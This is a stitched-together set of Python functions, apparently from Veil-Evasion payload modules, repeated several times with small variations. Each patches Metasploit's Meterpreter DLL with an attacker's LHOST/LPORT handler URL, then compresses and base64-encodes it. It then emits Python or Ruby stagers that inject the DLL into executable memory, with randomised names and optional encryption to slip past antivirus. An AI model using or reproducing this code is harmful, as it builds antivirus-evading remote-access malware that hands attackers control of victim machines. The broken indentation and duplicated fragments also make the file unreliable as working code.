payloadCode += Shellcode + " = " + randInflateFuncName + "(\"" + compressedDll + "\")\n"
payloadCode += "v = API.new('VirtualAlloc', 'IIII', 'I');r = API.new('RtlMoveMemory', 'IPI', 'V');c = API.new('CreateThread', 'IIIIIP', 'I');w = API.new('WaitForSingleObject', 'II', 'I')\n"
payloadCode += "%s = %s\n" %(payloadName, Shellcode)
payloadCode += "%s = v.call(0,(%s.length > 0x1000 ? %s.length : 0x1000), 0x1000, 0x40)\n" %(ptrName,payloadName,payloadName)
payloadCode += "x = r.call(%s,%s,%s.length); %s = c.call(0,0,%s,0,0,0); x = w.call(%s,0xFFFFFFF)\n" %(ptrName,payloadName,payloadName,threadName,ptrName,threadName)
return payloadCode
def generate(self):
if os.path.exists(settings.METASPLOIT_PATH + "/data/meterpreter/metsrv.x86.dll"):
metsrvPath = settings.METASPLOIT_PATH + "/data/meterpreter/metsrv.x86.dll"
else:
metsrvPath = settings.METASPLOIT_PATH + "/data/meterpreter/metsrv.dll"
f = open(metsrvPath, 'rb')
meterpreterDll = f.read()
f.close()
# lambda function used for patching the metsvc.dll
dllReplace = lambda dll,ind,s: dll[:ind] + s + dll[ind+len(s):]
# patch the metsrv.dll header
headerPatch = "\x4d\x5a\xe8\x00\x00\x00\x00\x5b\x52\x45\x55\x89\xe5\x81\xc3\xb0"
headerPatch += "\x0e\x00\x00\xff\xd3\x89\xc3\x57\x68\x04\x00\x00\x00\x50\xff\xd0"
headerPatch += "\x68\xe0\x1d\x2a\x0a\x68\x05\x00\x00\x00\x50\xff\xd3\x00\x00\x00"
meterpreterDll = dllReplace(meterpreterDll,0,headerPatch)
# patch in the default user agent string
userAgentIndex = meterpreterDll.index("METERPRETER_UA\x00")
userAgentString = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00"
meterpreterDll = dllReplace(meterpreterDll,userAgentIndex,userAgentString)
# turn off SSL
sslIndex = meterpreterDll.index("METERPRETER_TRANSPORT_SSL")
sslString = "METERPRETER_TRANSPORT_HTTPS\x00"
meterpreterDll = dllReplace(meterpreterDll,sslIndex,sslString)
# replace the URL/port of the handler
urlIndex = meterpreterDll.index("https://" + ("X" * 256))
urlString = "https://" + self.required_options['LHOST'][0] + ":" + str(self.required_options['LPORT'][0]) + "/" + self.genHTTPChecksum() + "_" + randomizer.randomString(16) + "/\x00"
meterpreterDll = dllReplace(meterpreterDll,urlIndex,urlString)
# replace the expiration timeout with the default value of 300
expirationTimeoutIndex = meterpreterDll.index(struct.pack('<I', 0xb64be661))
expirationTimeout = struct.pack('<I', 604800)
meterpreterDll = dllReplace(meterpreterDll,expirationTimeoutIndex,expirationTimeout)
# replace the communication timeout with the default value of 300
communicationTimeoutIndex = meterpreterDll.index(struct.pack('<I', 0xaf79257f))
communicationTimeout = struct.pack('<I', 300)
meterpreterDll = dllReplace(meterpreterDll,communicationTimeoutIndex,communicationTimeout)
# compress/base64 encode the dll
compressedDll = helpers.deflate(meterpreterDll)
# actually build out the payload
payloadCode = ""
# traditional void pointer injection
if self.required_options["inject_method"][0].lower() == "void":
# doing void * cast
payloadCode += "from ctypes import *\nimport base64,zlib\n"
randInflateFuncName = randomizer.randomString()
randb64stringName = randomizer.randomString()
randVarName = randomizer.randomString()
# deflate function
payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n"
payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n"
payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n"
randVarName = randomizer.randomString()
randFuncName = randomizer.randomString()
payloadCode += randVarName + " = " + randInflateFuncName + "(\"" + compressedDll + "\")\n"
payloadCode += randFuncName + " = cast(" + randVarName + ", CFUNCTYPE(c_void_p))\n"
payloadCode += randFuncName+"()\n"
# VirtualAlloc() injection
else:
payloadCode += 'import ctypes,base64,zlib\n'
randInflateFuncName = randomizer.randomString()
randb64stringName = randomizer.randomString()
randVarName = randomizer.randomString()
randPtr = randomizer.randomString()
randBuf = randomizer.randomString()
randHt = randomizer.randomString()
# deflate function
payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n"
payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n"
payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n"
payloadCode += randVarName + " = bytearray(" + randInflateFuncName + "(\"" + compressedDll + "\"))\n"
payloadCode += randPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ randVarName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
payloadCode += randBuf + ' = (ctypes.c_char * len(' + randVarName + ')).from_buffer(' + randVarName + ')\n'
payloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + randPtr + '),' + randBuf + ',ctypes.c_int(len(' + randVarName + ')))\n'
payloadCode += randHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + randPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
payloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + randHt + '),ctypes.c_int(-1))\n'
if self.required_options["use_pyherion"][0].lower() == "y":
payloadCode = crypters.pyherion(payloadCode)
return payloadCode
def generate(self):
metsrvPath = veil.METASPLOIT_PATH + "/data/meterpreter/metsrv.dll"
f = open(metsrvPath, 'rb')
meterpreterDll = f.read()
f.close()
# lambda function used for patching the metsvc.dll
dllReplace = lambda dll, ind, s: dll[:ind] + s + dll[ind + len(s):]
# patch the metsrv.dll header
headerPatch = "\x4d\x5a\xe8\x00\x00\x00\x00\x5b\x52\x45\x55\x89\xe5\x81\xc3\x37"
headerPatch += "\x15\x00\x00\xff\xd3\x89\xc3\x57\x68\x04\x00\x00\x00\x50\xff\xd0"
headerPatch += "\x68\xe0\x1d\x2a\x0a\x68\x05\x00\x00\x00\x50\xff\xd3\x00\x00\x00"
meterpreterDll = dllReplace(meterpreterDll, 0, headerPatch)
# patch in the default user agent string
userAgentIndex = meterpreterDll.index("METERPRETER_UA\x00")
userAgentString = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00"
meterpreterDll = dllReplace(meterpreterDll, userAgentIndex,
userAgentString)
# turn on SSL
sslIndex = meterpreterDll.index("METERPRETER_TRANSPORT_SSL")
sslString = "METERPRETER_TRANSPORT_HTTPS\x00"
meterpreterDll = dllReplace(meterpreterDll, sslIndex, sslString)
# replace the URL/port of the handler
urlIndex = meterpreterDll.index("https://" + ("X" * 256))
urlString = "https://" + self.required_options['LHOST'][0] + ":" + str(
self.required_options['LPORT'][0]) + "/" + self.genHTTPChecksum(
) + "_" + randomizer.randomString(16) + "/\x00"
meterpreterDll = dllReplace(meterpreterDll, urlIndex, urlString)
# replace the expiration timeout with the default value of 300
expirationTimeoutIndex = meterpreterDll.index(
struct.pack('<I', 0xb64be661))
expirationTimeout = struct.pack('<I', 604800)
meterpreterDll = dllReplace(meterpreterDll, expirationTimeoutIndex,
expirationTimeout)
# replace the communication timeout with the default value of 300
communicationTimeoutIndex = meterpreterDll.index(
struct.pack('<I', 0xaf79257f))
communicationTimeout = struct.pack('<I', 300)
meterpreterDll = dllReplace(meterpreterDll, communicationTimeoutIndex,
communicationTimeout)
# compress/base64 encode the dll
compressedDll = helpers.deflate(meterpreterDll)
# actually build out the payload
payloadCode = ""
# doing void * cast
payloadCode += "from ctypes import *\nimport base64,zlib\n"
randInflateFuncName = randomizer.randomString()
randb64stringName = randomizer.randomString()
randVarName = randomizer.randomString()
# deflate function
payloadCode += "def " + randInflateFuncName + "(" + randb64stringName + "):\n"
payloadCode += "\t" + randVarName + " = base64.b64decode( " + randb64stringName + " )\n"
payloadCode += "\treturn zlib.decompress( " + randVarName + " , -15)\n"
randVarName = randomizer.randomString()
randFuncName = randomizer.randomString()
payloadCode += randVarName + " = " + randInflateFuncName + "(\"" + compressedDll + "\")\n"
payloadCode += randFuncName + " = cast(" + randVarName + ", CFUNCTYPE(c_void_p))\n"
payloadCode += randFuncName + "()\n"
if self.required_options["use_encrypter"][0].lower() == "y":
payloadCode = crypters.pyherion(payloadCode)
return payloadCode
def generate(self):
if os.path.exists(settings.METASPLOIT_PATH + "/data/meterpreter/metsrv.x86.dll"):
metsrvPath = settings.METASPLOIT_PATH + "/data/meterpreter/metsrv.x86.dll"
else:
metsrvPath = settings.METASPLOIT_PATH + "/data/meterpreter/metsrv.dll"
f = open(metsrvPath, "rb")
meterpreterDll = f.read()
f.close()
# lambda function used for patching the metsvc.dll
dllReplace = lambda dll, ind, s: dll[:ind] + s + dll[ind + len(s) :]
# patch the metsrv.dll header
headerPatch = "\x4d\x5a\xe8\x00\x00\x00\x00\x5b\x52\x45\x55\x89\xe5\x81\xc3\xb0"
headerPatch += "\x0e\x00\x00\xff\xd3\x89\xc3\x57\x68\x04\x00\x00\x00\x50\xff\xd0"
headerPatch += "\x68\xe0\x1d\x2a\x0a\x68\x05\x00\x00\x00\x50\xff\xd3\x00\x00\x00"
meterpreterDll = dllReplace(meterpreterDll, 0, headerPatch)
# patch in the default user agent string
userAgentIndex = meterpreterDll.index("METERPRETER_UA\x00")
userAgentString = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00"
meterpreterDll = dllReplace(meterpreterDll, userAgentIndex, userAgentString)
# turn off SSL
sslIndex = meterpreterDll.index("METERPRETER_TRANSPORT_SSL")
sslString = "METERPRETER_TRANSPORT_HTTPS\x00"
meterpreterDll = dllReplace(meterpreterDll, sslIndex, sslString)
# replace the URL/port of the handler
urlIndex = meterpreterDll.index("https://" + ("X" * 256))
urlString = (
"https://"
+ self.required_options["LHOST"][0]
+ ":"
+ str(self.required_options["LPORT"][0])
+ "/"
+ self.genHTTPChecksum()
+ "_"
+ randomizer.randomString(16)
+ "/\x00"
)
meterpreterDll = dllReplace(meterpreterDll, urlIndex, urlString)
# replace the expiration timeout with the default value of 300
expirationTimeoutIndex = meterpreterDll.index(struct.pack("<I", 0xB64BE661))
expirationTimeout = struct.pack("<I", 604800)
meterpreterDll = dllReplace(meterpreterDll, expirationTimeoutIndex, expirationTimeout)
# replace the communication timeout with the default value of 300
communicationTimeoutIndex = meterpreterDll.index(struct.pack("<I", 0xAF79257F))
communicationTimeout = struct.pack("<I", 300)
meterpreterDll = dllReplace(meterpreterDll, communicationTimeoutIndex, communicationTimeout)
# compress/base64 encode the dll
compressedDll = helpers.deflate(meterpreterDll)
# actually build out the payload
payloadCode = ""
# traditional void pointer injection
if self.required_options["inject_method"][0].lower() == "void":
# doing void * cast
payloadCode += "from ctypes import *\nimport base64,zlib\n"
randInflateFuncName = randomizer.randomString()
randb64stringName = randomizer.randomString()
randVarName = randomizer.randomString()
# deflate function
payloadCode += "def " + randInflateFuncName + "(" + randb64stringName + "):\n"
payloadCode += "\t" + randVarName + " = base64.b64decode( " + randb64stringName + " )\n"
payloadCode += "\treturn zlib.decompress( " + randVarName + " , -15)\n"
randVarName = randomizer.randomString()
randFuncName = randomizer.randomString()
payloadCode += randVarName + " = " + randInflateFuncName + '("' + compressedDll + '")\n'
payloadCode += randFuncName + " = cast(" + randVarName + ", CFUNCTYPE(c_void_p))\n"
payloadCode += randFuncName + "()\n"
# VirtualAlloc() injection
else:
payloadCode += "import ctypes,base64,zlib\n"
randInflateFuncName = randomizer.randomString()
randb64stringName = randomizer.randomString()
randVarName = randomizer.randomString()
randPtr = randomizer.randomString()
randBuf = randomizer.randomString()
randHt = randomizer.randomString()
# deflate function
payloadCode += "def " + randInflateFuncName + "(" + randb64stringName + "):\n"
payloadCode += "\t" + randVarName + " = base64.b64decode( " + randb64stringName + " )\n"
payloadCode += "\treturn zlib.decompress( " + randVarName + " , -15)\n"
payloadCode += randVarName + " = bytearray(" + randInflateFuncName + '("' + compressedDll + '"))\n'
payloadCode += (
randPtr
+ " = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len("
+ randVarName
+ ")),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n"
)
payloadCode += randBuf + " = (ctypes.c_char * len(" + randVarName + ")).from_buffer(" + randVarName + ")\n"
payloadCode += (
"ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int("
+ randPtr
+ "),"
+ randBuf
+ ",ctypes.c_int(len("
+ randVarName
+ ")))\n"
)
payloadCode += (
randHt
+ " = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int("
+ randPtr
+ "),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n"
)
payloadCode += "ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(" + randHt + "),ctypes.c_int(-1))\n"
if self.required_options["use_pyherion"][0].lower() == "y":
payloadCode = crypters.pyherion(payloadCode)
return payloadCode
def generate(self):
# lambda function used for patching the metsvc.dll
dllReplace = lambda dll, ind, s: dll[:ind] + s + dll[ind + len(s) :]
# patch the metsrv.dll header
meterpreterDll, headerPatch = helpers.selfcontained_patch()
meterpreterDll = dllReplace(meterpreterDll, 0, headerPatch)
# patch in the default user agent string
userAgentIndex = meterpreterDll.index("METERPRETER_UA\x00")
userAgentString = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00"
meterpreterDll = dllReplace(meterpreterDll, userAgentIndex, userAgentString)
# turn off SSL
sslIndex = meterpreterDll.index("METERPRETER_TRANSPORT_SSL")
sslString = "METERPRETER_TRANSPORT_HTTP\x00"
meterpreterDll = dllReplace(meterpreterDll, sslIndex, sslString)
# replace the URL/port of the handler
urlIndex = meterpreterDll.index("https://" + ("X" * 256))
urlString = (
"http://"
+ self.required_options["LHOST"][0]
+ ":"
+ str(self.required_options["LPORT"][0])
+ "/"
+ self.genHTTPChecksum()
+ "_"
+ helpers.randomString(16)
+ "/\x00"
)
meterpreterDll = dllReplace(meterpreterDll, urlIndex, urlString)
# replace the expiration timeout with the default value of 300
expirationTimeoutIndex = meterpreterDll.index(struct.pack("<I", 0xB64BE661))
expirationTimeout = struct.pack("<I", 604800)
meterpreterDll = dllReplace(meterpreterDll, expirationTimeoutIndex, expirationTimeout)
# replace the communication timeout with the default value of 300
communicationTimeoutIndex = meterpreterDll.index(struct.pack("<I", 0xAF79257F))
communicationTimeout = struct.pack("<I", 300)
meterpreterDll = dllReplace(meterpreterDll, communicationTimeoutIndex, communicationTimeout)
# compress/base64 encode the dll
compressedDll = helpers.deflate(meterpreterDll)
# actually build out the payload
payloadCode = ""
payloadCode = (
"require 'rubygems';require 'win32/api';require 'socket';require 'base64';require 'zlib';include Win32\n"
)
payloadCode += "exit if Object.const_defined?(:Ocra)\n"
# randomly generate out variable names
payloadName = helpers.randomString().lower()
ptrName = helpers.randomString().lower()
threadName = helpers.randomString().lower()
Shellcode = helpers.randomString().lower()
randInflateFuncName = helpers.randomString().lower()
randb64stringName = helpers.randomString().lower()
randVarName = helpers.randomString().lower()
# deflate function
payloadCode += "def " + randInflateFuncName + "(" + randb64stringName + ")\n"
payloadCode += " " + randVarName + " = Base64.decode64(" + randb64stringName + ")\n"
payloadCode += " zstream = Zlib::Inflate.new(-Zlib::MAX_WBITS)\n"
payloadCode += " buf = zstream.inflate(" + randVarName + ")\n"
payloadCode += " zstream.finish\n"
payloadCode += " zstream.close\n"
payloadCode += " return buf\n"
payloadCode += "end\n\n"
payloadCode += Shellcode + " = " + randInflateFuncName + '("' + compressedDll + '")\n'
payloadCode += "v = API.new('VirtualAlloc', 'IIII', 'I');r = API.new('RtlMoveMemory', 'IPI', 'V');c = API.new('CreateThread', 'IIIIIP', 'I');w = API.new('WaitForSingleObject', 'II', 'I')\n"
payloadCode += "%s = %s\n" % (payloadName, Shellcode)
payloadCode += "%s = v.call(0,(%s.length > 0x1000 ? %s.length : 0x1000), 0x1000, 0x40)\n" % (
ptrName,
payloadName,
payloadName,
)
payloadCode += "x = r.call(%s,%s,%s.length); %s = c.call(0,0,%s,0,0,0); x = w.call(%s,0xFFFFFFF)\n" % (
ptrName,
payloadName,
payloadName,
threadName,
ptrName,
threadName,
)
return payloadCode
def generate(self):
# get the main meterpreter .dll with the header/loader patched
meterpreterDll = patch.headerPatch()
# turn off SSL
meterpreterDll = patch.patchTransport(meterpreterDll, False)
# replace the URL
urlString = "http://" + self.required_options['LHOST'][0] + ":" + str(self.required_options['LPORT'][0]) + "/" + helpers.genHTTPChecksum() + "/\x00"
meterpreterDll = patch.patchURL(meterpreterDll, urlString)
# replace in the UA
meterpreterDll = patch.patchUA(meterpreterDll, "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00")
# compress/base64 encode the dll
compressedDll = helpers.deflate(meterpreterDll)
# actually build out the payload
payloadCode = ""
# traditional void pointer injection
if self.required_options["inject_method"][0].lower() == "void":
# doing void * cast
payloadCode += "from ctypes import *\nimport base64,zlib\n"
randInflateFuncName = helpers.randomString()
randb64stringName = helpers.randomString()
randVarName = helpers.randomString()
# deflate function
payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n"
payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n"
payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n"
randVarName = helpers.randomString()
randFuncName = helpers.randomString()
payloadCode += randVarName + " = " + randInflateFuncName + "(\"" + compressedDll + "\")\n"
payloadCode += randFuncName + " = cast(" + randVarName + ", CFUNCTYPE(c_void_p))\n"
payloadCode += randFuncName+"()\n"
# VirtualAlloc() injection
else:
payloadCode += 'import ctypes,base64,zlib\n'
randInflateFuncName = helpers.randomString()
randb64stringName = helpers.randomString()
randVarName = helpers.randomString()
randPtr = helpers.randomString()
randBuf = helpers.randomString()
randHt = helpers.randomString()
# deflate function
payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n"
payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n"
payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n"
payloadCode += randVarName + " = bytearray(" + randInflateFuncName + "(\"" + compressedDll + "\"))\n"
payloadCode += randPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ randVarName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
payloadCode += randBuf + ' = (ctypes.c_char * len(' + randVarName + ')).from_buffer(' + randVarName + ')\n'
payloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + randPtr + '),' + randBuf + ',ctypes.c_int(len(' + randVarName + ')))\n'
payloadCode += randHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + randPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
payloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + randHt + '),ctypes.c_int(-1))\n'
if self.required_options["use_pyherion"][0].lower() == "y":
payloadCode = encryption.pyherion(payloadCode)
return payloadCode
def generate(self):
if os.path.exists(
settings.METASPLOIT_PATH +
"/vendor/bundle/ruby/1.9.1/gems/meterpreter_bins-0.0.10/meterpreter/metsrv.x86.dll"
):
metsrvPath = settings.METASPLOIT_PATH + "/vendor/bundle/ruby/1.9.1/gems/meterpreter_bins-0.0.10/meterpreter/metsrv.x86.dll"
else:
print "[*] Error: You either do not have the latest version of Metasploit or"
print "[*] Error: do not have your METASPLOIT_PATH set correctly in your settings file."
print "[*] Error: Please fix either issue then select this payload again!"
sys.exit()
f = open(metsrvPath, 'rb')
meterpreterDll = f.read()
f.close()
# lambda function used for patching the metsvc.dll
dllReplace = lambda dll, ind, s: dll[:ind] + s + dll[ind + len(s):]
# patch the metsrv.dll header
headerPatch = helpers.selfcontained_patch()
meterpreterDll = dllReplace(meterpreterDll, 0, headerPatch)
# patch in the default user agent string
userAgentIndex = meterpreterDll.index("METERPRETER_UA\x00")
userAgentString = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00"
meterpreterDll = dllReplace(meterpreterDll, userAgentIndex,
userAgentString)
# turn off SSL
sslIndex = meterpreterDll.index("METERPRETER_TRANSPORT_SSL")
sslString = "METERPRETER_TRANSPORT_HTTPS\x00"
meterpreterDll = dllReplace(meterpreterDll, sslIndex, sslString)
# replace the URL/port of the handler
urlIndex = meterpreterDll.index("https://" + ("X" * 256))
urlString = "https://" + self.required_options['LHOST'][0] + ":" + str(
self.required_options['LPORT'][0]) + "/" + self.genHTTPChecksum(
) + "_" + helpers.randomString(16) + "/\x00"
meterpreterDll = dllReplace(meterpreterDll, urlIndex, urlString)
# replace the expiration timeout with the default value of 300
expirationTimeoutIndex = meterpreterDll.index(
struct.pack('<I', 0xb64be661))
expirationTimeout = struct.pack('<I', 604800)
meterpreterDll = dllReplace(meterpreterDll, expirationTimeoutIndex,
expirationTimeout)
# replace the communication timeout with the default value of 300
communicationTimeoutIndex = meterpreterDll.index(
struct.pack('<I', 0xaf79257f))
communicationTimeout = struct.pack('<I', 300)
meterpreterDll = dllReplace(meterpreterDll, communicationTimeoutIndex,
communicationTimeout)
# compress/base64 encode the dll
compressedDll = helpers.deflate(meterpreterDll)
# actually build out the payload
payloadCode = ""
# traditional void pointer injection
if self.required_options["inject_method"][0].lower() == "void":
# doing void * cast
payloadCode += "from ctypes import *\nimport base64,zlib\n"
randInflateFuncName = helpers.randomString()
randb64stringName = helpers.randomString()
randVarName = helpers.randomString()
# deflate function
payloadCode += "def " + randInflateFuncName + "(" + randb64stringName + "):\n"
payloadCode += "\t" + randVarName + " = base64.b64decode( " + randb64stringName + " )\n"
payloadCode += "\treturn zlib.decompress( " + randVarName + " , -15)\n"
randVarName = helpers.randomString()
randFuncName = helpers.randomString()
payloadCode += randVarName + " = " + randInflateFuncName + "(\"" + compressedDll + "\")\n"
payloadCode += randFuncName + " = cast(" + randVarName + ", CFUNCTYPE(c_void_p))\n"
payloadCode += randFuncName + "()\n"
# VirtualAlloc() injection
else:
payloadCode += 'import ctypes,base64,zlib\n'
randInflateFuncName = helpers.randomString()
randb64stringName = helpers.randomString()
randVarName = helpers.randomString()
randPtr = helpers.randomString()
randBuf = helpers.randomString()
randHt = helpers.randomString()
# deflate function
payloadCode += "def " + randInflateFuncName + "(" + randb64stringName + "):\n"
payloadCode += "\t" + randVarName + " = base64.b64decode( " + randb64stringName + " )\n"
payloadCode += "\treturn zlib.decompress( " + randVarName + " , -15)\n"
payloadCode += randVarName + " = bytearray(" + randInflateFuncName + "(\"" + compressedDll + "\"))\n"
payloadCode += randPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + randVarName + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
payloadCode += randBuf + ' = (ctypes.c_char * len(' + randVarName + ')).from_buffer(' + randVarName + ')\n'
payloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + randPtr + '),' + randBuf + ',ctypes.c_int(len(' + randVarName + ')))\n'
payloadCode += randHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + randPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
payloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + randHt + '),ctypes.c_int(-1))\n'
if self.required_options["use_pyherion"][0].lower() == "y":
payloadCode = encryption.pyherion(payloadCode)
return payloadCode
def generate(self):
if os.path.exists(
settings.METASPLOIT_PATH +
"/vendor/bundle/ruby/1.9.1/gems/meterpreter_bins-0.0.10/meterpreter/metsrv.x86.dll"
):
metsrvPath = settings.METASPLOIT_PATH + "/vendor/bundle/ruby/1.9.1/gems/meterpreter_bins-0.0.10/meterpreter/metsrv.x86.dll"
else:
print "[*] Error: You either do not have the latest version of Metasploit or"
print "[*] Error: do not have your METASPLOIT_PATH set correctly in your settings file."
print "[*] Error: Please fix either issue then select this payload again!"
sys.exit()
f = open(metsrvPath, 'rb')
meterpreterDll = f.read()
f.close()
# lambda function used for patching the metsvc.dll
dllReplace = lambda dll, ind, s: dll[:ind] + s + dll[ind + len(s):]
# patch the metsrv.dll header
headerPatch = helpers.selfcontained_patch()
meterpreterDll = dllReplace(meterpreterDll, 0, headerPatch)
# patch in the default user agent string
userAgentIndex = meterpreterDll.index("METERPRETER_UA\x00")
userAgentString = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00"
meterpreterDll = dllReplace(meterpreterDll, userAgentIndex,
userAgentString)
# turn off SSL
sslIndex = meterpreterDll.index("METERPRETER_TRANSPORT_SSL")
sslString = "METERPRETER_TRANSPORT_HTTPS\x00"
meterpreterDll = dllReplace(meterpreterDll, sslIndex, sslString)
# replace the URL/port of the handler
urlIndex = meterpreterDll.index("https://" + ("X" * 256))
urlString = "https://" + self.required_options['LHOST'][0] + ":" + str(
self.required_options['LPORT'][0]) + "/" + self.genHTTPChecksum(
) + "_" + helpers.randomString(16) + "/\x00"
meterpreterDll = dllReplace(meterpreterDll, urlIndex, urlString)
# replace the expiration timeout with the default value of 300
expirationTimeoutIndex = meterpreterDll.index(
struct.pack('<I', 0xb64be661))
expirationTimeout = struct.pack('<I', 604800)
meterpreterDll = dllReplace(meterpreterDll, expirationTimeoutIndex,
expirationTimeout)
# replace the communication timeout with the default value of 300
communicationTimeoutIndex = meterpreterDll.index(
struct.pack('<I', 0xaf79257f))
communicationTimeout = struct.pack('<I', 300)
meterpreterDll = dllReplace(meterpreterDll, communicationTimeoutIndex,
communicationTimeout)
# compress/base64 encode the dll
compressedDll = helpers.deflate(meterpreterDll)
# actually build out the payload
payloadCode = ""
payloadCode = "require 'rubygems';require 'win32/api';require 'socket';require 'base64';require 'zlib';include Win32\n"
payloadCode += "exit if Object.const_defined?(:Ocra)\n"
# randomly generate out variable names
payloadName = helpers.randomString().lower()
ptrName = helpers.randomString().lower()
threadName = helpers.randomString().lower()
Shellcode = helpers.randomString().lower()
randInflateFuncName = helpers.randomString().lower()
randb64stringName = helpers.randomString().lower()
randVarName = helpers.randomString().lower()
# deflate function
payloadCode += "def " + randInflateFuncName + "(" + randb64stringName + ")\n"
payloadCode += " " + randVarName + " = Base64.decode64(" + randb64stringName + ")\n"
payloadCode += " zstream = Zlib::Inflate.new(-Zlib::MAX_WBITS)\n"
payloadCode += " buf = zstream.inflate(" + randVarName + ")\n"
payloadCode += " zstream.finish\n"
payloadCode += " zstream.close\n"
payloadCode += " return buf\n"
payloadCode += "end\n\n"
payloadCode += Shellcode + " = " + randInflateFuncName + "(\"" + compressedDll + "\")\n"
payloadCode += "v = API.new('VirtualAlloc', 'IIII', 'I');r = API.new('RtlMoveMemory', 'IPI', 'V');c = API.new('CreateThread', 'IIIIIP', 'I');w = API.new('WaitForSingleObject', 'II', 'I')\n"
payloadCode += "%s = %s\n" % (payloadName, Shellcode)
payloadCode += "%s = v.call(0,(%s.length > 0x1000 ? %s.length : 0x1000), 0x1000, 0x40)\n" % (
ptrName, payloadName, payloadName)
payloadCode += "x = r.call(%s,%s,%s.length); %s = c.call(0,0,%s,0,0,0); x = w.call(%s,0xFFFFFFF)\n" % (
ptrName, payloadName, payloadName, threadName, ptrName, threadName)
return payloadCode